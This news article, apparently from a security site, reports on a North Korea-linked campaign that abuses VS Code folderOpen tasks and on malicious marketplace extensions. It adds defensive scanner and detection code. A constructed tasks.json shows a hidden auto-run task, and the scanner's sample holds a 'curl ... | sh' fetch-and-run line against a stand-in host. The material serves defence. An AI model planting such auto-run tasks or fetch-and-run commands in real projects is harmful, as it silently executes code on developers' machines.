"The infection chain begins with emails containing links to actor-controlled GitHub repositories hosting malicious scripts that result in the execution of cross-platform malware for macOS, Linux, and Windows, including an open-source Go framework named Overlord," Proofpoint researchers Saher Naumaan and Carlos Rubio said.
UNK_DeadDrop: a recruitment lure delivering code that runs itself
Proofpoint has named a recent campaign UNK_DeadDrop and linked its tradecraft to a persistent North Korea-aligned cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). Over a six-week period the actor sent more than 250 emails to nearly 100 organizations across finance, cryptocurrency, education, technology and other sectors. Over 75% of targets were in the United States; others were in the U.K., Australia, France, Brazil, Germany, India, Israel, Japan, and the Netherlands.
The emails impersonated developer recruitment or code-review workflows, directing recipients to clone GitHub repositories and open them in Visual Studio Code (VS Code) or Cursor. Proofpoint says the repositories contained scripts that download platform-specific loaders — a shell script for macOS and Linux, and a VBScript for Windows — which then install a malicious VS Code extension (VSIX) that masquerades as a Google service.
Abusing VS Code: runOn: folderOpen and persistent extension installs
The technique Proofpoint singles out as the strongest link to the North Korean cluster is abuse of VS Code task configuration: a task in the repository's `.vscode/tasks.json` whose `runOptions` carry `"runOn": "folderOpen"`. Once the user has trusted the workspace, such a task runs as soon as the editor opens the folder, with no further interaction; the Workspace Trust prompt on first open is the only gate in stock VS Code (and Cursor, a VS Code fork, has shipped with Workspace Trust disabled by default). Proofpoint notes that Contagious Interview actors have used this approach since December 2025.
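For reference, this is the shape such a task takes inside a lure repository. It is an added illustration, not a file from Proofpoint's report or from the campaign; the label and the command are placeholders standing in for whatever the loader script was called.

```jsonc
// .vscode/tasks.json as shipped in the cloned repository (constructed example)
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Prepare workspace",                // innocuous name shown in the task list
      "type": "shell",
      "command": "sh ./scripts/bootstrap.sh",      // placeholder for the platform loader
      "runOptions": { "runOn": "folderOpen" },     // run automatically when the folder opens
      "presentation": { "reveal": "never" }        // keep the terminal panel closed while it runs
    }
  ]
}
```

The repository-side file cannot be prevented, but the user-side setting `"task.allowAutomaticTasks": "off"` in VS Code's settings.json disables folderOpen tasks for every workspace, and opening an unfamiliar clone in Restricted Mode (declining the trust prompt) keeps them from running until you have read the file.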
On Linux and macOS the loader delivers a custom build of the open-source Overlord framework; it prompts victims with a fake security pop-up to capture system passwords and enables data-theft functions. On Windows the VBScript executes a CMD file that installs the malicious extension, which communicates with an external server and performs reconnaissance and credential theft. Proofpoint reported exfiltration to "23.137.105[.]75:5173" via HTTP POST. Unlike the Linux/macOS agents, Proofpoint said the Windows pipeline uploads ZIP files, cleans up, and terminates rather than maintaining a persistent connection.
Marketplace backdoors: Yeeth Security finds VS Code extensions with SharePoint C2
Separately, Yeeth Security identified three malicious VS Code extensions on the official marketplace — "ByteBinTools.jupyter-powerdev-2026.6.8.vsix," "ToolCraft.jupyter-powertools-3.21.0.vsix," and "OLDev.markdown-mode-devtools-2.1.0.vsix" — that pose as Jupyter productivity tools but implement a multi-stage backdoor.
Yeeth's analysis shows a JavaScript layer that uses Microsoft Graph API and SharePoint as a command-and-control channel, with a SharePoint site acting as a command queue, victim registry, and exfiltration store. The backdoor supports arbitrary file read/write, file uploads/downloads, and code execution through a Windows executable and a Python script for Linux and macOS. The C2 can run commands and issue "host_action" operations to enumerate and transfer files.
Context: a wide set of developer-facing campaigns and supply-chain intrusions
Proofpoint and other firms describe a broad ecosystem of developer-focused abuse that intersects with UNK_DeadDrop. OpenSourceMalware detailed a follow-up to the Axios supply-chain incident that used three malicious npm packages and pre-staged backup infrastructure to deliver an information stealer. Researchers documented TaskJacker, which drops malicious VS Code task files that execute when a repository is opened, and Contagious Interview's use of Git hooks (".githooks/pre-commit") shipped inside repositories; a pre-commit hook runs at the victim's first commit rather than on the clone itself, and only once Git has been pointed at that directory via core.hooksPath, so the hook directory is a second thing to read before working in a cloned project.
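The two repository-borne vectors above (folderOpen tasks in `.vscode/tasks.json`, and hook scripts under `.githooks/` or a configured `core.hooksPath`) can be checked on a fresh clone before the folder is ever opened in an editor. The scanner below is an added example written for this page, not tooling from Proofpoint or any of the researchers cited; the sample repository it builds, including the tasks.json contents and the `example.invalid` URL, is constructed for the demonstration. VS Code parses tasks.json as JSONC, so the scanner tolerates comments and trailing commas without being fooled by `//` inside a quoted URL.

```python
#!/usr/bin/env python3
"""Pre-open scanner for cloned repositories (added example, not vendor code).

Flags:
  * tasks in .vscode/tasks.json with runOptions.runOn == "folderOpen"
  * hook scripts under .githooks/ or any directory named by core.hooksPath
Usage: scan_repo.py <path-to-clone>   (no argument: scans a constructed sample)
"""
import json
import os
import re
import sys
import tempfile

_TRAILING_COMMA_RE = re.compile(r',(\s*[}\]])')


def strip_jsonc(text):
    """Remove // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:                       # inside a string: copy verbatim
            out.append(c)
            if c == '\\' and i + 1 < n:  # keep escaped quotes intact
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith('//', i):   # line comment: drop to end of line
            j = text.find('\n', i)
            i = n if j < 0 else j
        elif text.startswith('/*', i):   # block comment: drop to closing */
            j = text.find('*/', i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    return _TRAILING_COMMA_RE.sub(r'\1', ''.join(out))


def parse_jsonc(text):
    return json.loads(strip_jsonc(text))


def find_auto_run_tasks(repo):
    """Return (kind, detail) findings for tasks that fire on folder open."""
    path = os.path.join(repo, '.vscode', 'tasks.json')
    if not os.path.isfile(path):
        return []
    with open(path, encoding='utf-8-sig') as f:
        try:
            doc = parse_jsonc(f.read())
        except json.JSONDecodeError as e:
            return [('tasks.json unparseable, inspect manually', str(e))]
    findings = []
    for task in doc.get('tasks', []):
        if (task.get('runOptions') or {}).get('runOn') != 'folderOpen':
            continue
        # VS Code lets a task override its command per platform; report all of them.
        cmds = [task.get('command')] + [
            (task.get(k) or {}).get('command') for k in ('windows', 'linux', 'osx')]
        cmds = [c for c in cmds if c]
        findings.append(('auto-run task',
                         f"{task.get('label', '<unnamed>')}: {' | '.join(cmds) or '<no command>'}"))
    return findings


def find_hook_scripts(repo):
    """Return findings for hook scripts a developer's Git could be pointed at."""
    hook_dirs = {'.githooks'}
    cfg = os.path.join(repo, '.git', 'config')
    if os.path.isfile(cfg):               # a clone should not carry hooksPath; flag it if it does
        with open(cfg, encoding='utf-8') as f:
            for line in f:
                m = re.match(r'\s*hooksPath\s*=\s*(\S+)', line)
                if m:
                    hook_dirs.add(m.group(1))
    findings = []
    for d in sorted(hook_dirs):
        full = os.path.join(repo, d)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            if os.path.isfile(os.path.join(full, name)):
                findings.append(('hook script', os.path.join(d, name)))
    return findings


def scan_repo(repo):
    return find_auto_run_tasks(repo) + find_hook_scripts(repo)


SAMPLE_TASKS_JSON = '''{
  // constructed sample; the command is a placeholder, not the real loader
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install dependencies",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    { "label": "Build", "type": "shell", "command": "npm run build" }
  ]
}
'''


def build_sample_repo():
    """Create a throwaway clone layout carrying both vectors (constructed data)."""
    repo = tempfile.mkdtemp(prefix='lure-')
    os.makedirs(os.path.join(repo, '.vscode'))
    os.makedirs(os.path.join(repo, '.githooks'))
    with open(os.path.join(repo, '.vscode', 'tasks.json'), 'w') as f:
        f.write(SAMPLE_TASKS_JSON)
    with open(os.path.join(repo, '.githooks', 'pre-commit'), 'w') as f:
        f.write('#!/bin/sh\necho placeholder hook\n')
    return repo


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_repo()
    for kind, detail in scan_repo(target) or [('clean', 'no auto-execution vectors found')]:
        print(f'[{kind}] {detail}')
```

Run it against every clone from an unsolicited "code review" or "take-home" invitation; a hit on either vector is reason to read the script rather than open the folder. The scanner only covers what lives in the repository, so it says nothing about what a task or hook downloads once it runs.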
Trend Micro and others report the group's use of compromised packages on Packagist, repository tampering to inject obfuscated JavaScript, and migration of tools like InvisibleFerret into Cython-compiled formats for evasion. Panther, OpenSourceMalware, and others have traced hundreds of malicious npm and GitHub packages and repositories delivering stealers, RATs, and loaders. Expel's Marcus Hutchins quantified the impact: in the first three months of 2026, attackers exfiltrated 26,584 cryptocurrency wallets from 2,726 infected developer systems and stole $12 million in cryptocurrency.
What this means for developers, security teams, and policymakers
- Developers and open-source maintainers: treat cloned repositories and incoming project files as potential execution vectors. Proofpoint's warning about "runOn: folderOpen" and TaskJacker-style task files shows that simply opening a project in VS Code can trigger loaders and extension installs, so read `.vscode/tasks.json` and any hook directory before opening an unfamiliar clone, and decline the Workspace Trust prompt until you have.
- Security teams and enterprise defenders: monitor for unusual VSIX installs, HTTP POST traffic to the IP seen in the campaign ("23.137.105[.]75:5173"), and the presence of Overlord or other unexpected binaries. The differing persistence models between platforms should shape detection and forensics playbooks: the Linux/macOS Overlord agent keeps a connection open, while the Windows stage uploads ZIP archives and exits, so on Windows expect a short burst of POSTs rather than periodic beaconing, and collect the host before the cleanup step removes the evidence.
- Policymakers and regulators: the pattern of shifting delivery mechanisms and pre-staged backup infrastructure cited by OpenSourceMalware, plus Expel's comment that financial motivation is central for North Korea, underscores that financially driven campaigns can scale rapidly and cross supply chains and marketplaces.
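The detection side of the bullets above, as an added example rather than code from Proofpoint, Yeeth Security, or any vendor: one check runs egress log lines against the reported exfiltration endpoint and groups hits per client so the Windows burst pattern is visible; the other reads VS Code's per-user extension inventory and flags the three extension IDs implied by the VSIX names Yeeth reported, plus any publisher outside an allowlist. The log format (an assumed squid-style `<ts> <client> <method> <url> <status> <bytes>` layout), the `extensions.json` structure, the allowlist and all sample lines are assumptions constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Detection helpers for the UNK_DeadDrop / marketplace-backdoor indicators
(added example, not vendor code). Log layout and extensions.json shape are assumed."""
import json
import re
from collections import defaultdict

EXFIL_IP, EXFIL_PORT = '23.137.105.75', 5173      # endpoint reported by Proofpoint (defanged in the article)

# Assumed egress log layout: <ts> <client_ip> <method> <url> <status> <bytes>
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+'
                    r'(?P<url>\S+)\s+(?P<status>\d{3})\s+(?P<bytes>\d+)$')
URL_HOST_RE = re.compile(r'^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?')


def match_exfil(line):
    """Return a hit dict for a POST to the reported exfil endpoint, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    u = URL_HOST_RE.match(m['url'])
    if not u:
        return None
    port = int(u['port'] or (443 if u['scheme'] == 'https' else 80))
    if m['method'] == 'POST' and u['host'] == EXFIL_IP and port == EXFIL_PORT:
        return {'ts': m['ts'], 'client': m['client'], 'bytes': int(m['bytes'])}
    return None


def scan_log(lines):
    return [hit for hit in map(match_exfil, lines) if hit]


def summarize(hits):
    """client -> (number of POSTs, total bytes): a few large POSTs then silence
    matches the upload-and-exit behaviour described for the Windows stage."""
    agg = defaultdict(lambda: [0, 0])
    for h in hits:
        agg[h['client']][0] += 1
        agg[h['client']][1] += h['bytes']
    return {client: tuple(v) for client, v in agg.items()}


# Extension IDs are publisher.name; derived from the three VSIX names Yeeth reported.
KNOWN_BAD_EXTENSIONS = {'bytebintools.jupyter-powerdev',
                        'toolcraft.jupyter-powertools',
                        'oldev.markdown-mode-devtools'}
# Assumed allowlist for a hypothetical organisation; tune to your environment.
ALLOWED_PUBLISHERS = {'ms-python', 'ms-vscode', 'vscode', 'github'}


def check_extensions(extensions_json_text):
    """~/.vscode/extensions/extensions.json is assumed to be a JSON list of
    {"identifier": {"id": "publisher.name"}, "version": ...} objects."""
    findings = []
    for ext in json.loads(extensions_json_text):
        ext_id = ext.get('identifier', {}).get('id', '').lower()   # marketplace IDs are case-insensitive
        publisher = ext_id.split('.', 1)[0]
        if ext_id in KNOWN_BAD_EXTENSIONS:
            findings.append(('known-bad', ext_id))
        elif publisher not in ALLOWED_PUBLISHERS:
            findings.append(('unvetted-publisher', ext_id))
    return findings


# Constructed sample data for a stand-alone run.
SAMPLE_LOG = """\
2026-06-02T09:14:03Z 10.0.5.21 GET https://marketplace.visualstudio.com/items 200 5120
2026-06-02T09:14:41Z 10.0.5.21 POST http://23.137.105.75:5173/upload 200 734112
2026-06-02T09:14:43Z 10.0.5.21 POST http://23.137.105.75:5173/upload 200 221893
2026-06-02T09:15:10Z 10.0.5.33 POST https://graph.microsoft.com/v1.0/me 200 812
2026-06-02T09:16:00Z 10.0.5.21 GET http://23.137.105.75:5173/ 404 119
"""
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2026.4.0"},
    {"identifier": {"id": "ToolCraft.jupyter-powertools"}, "version": "3.21.0"},
    {"identifier": {"id": "somepub.helper-pack"}, "version": "1.0.0"},
])

if __name__ == '__main__':
    for client, (count, total) in summarize(scan_log(SAMPLE_LOG.splitlines())).items():
        print(f'{client}: {count} POST(s) to {EXFIL_IP}:{EXFIL_PORT}, {total} bytes uploaded')
    for kind, ext_id in check_extensions(SAMPLE_EXTENSIONS_JSON):
        print(f'[{kind}] {ext_id}')
```

The IP match is deliberately narrow: it catches this campaign's reported endpoint and nothing else, so treat it as a hunt query, not a durable rule. The extension check is the part that generalises, since a publisher allowlist catches the next look-alike Jupyter tool as well. Neither check sees the Yeeth extensions' SharePoint traffic, which blends into normal Microsoft 365 use; for that you need per-process network attribution on the endpoint, not proxy logs.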
These incidents illustrate a steady evolution: threat actors are weaponizing everyday developer workflows and tooling into invisible delivery channels. The campaigns combine repository lures, IDE auto-execution, malicious marketplace artifacts, and cloud-based C2 over Microsoft Graph and SharePoint — a stack that traffics in trust as much as code. The practical question left by the record is whether IDE vendors, code-hosting platforms, and marketplaces can harden default behaviors and vet extensions quickly enough to blunt this class of attacks.
https://thehackernews.com/2026/06/north-korean-hackers-are-turning.html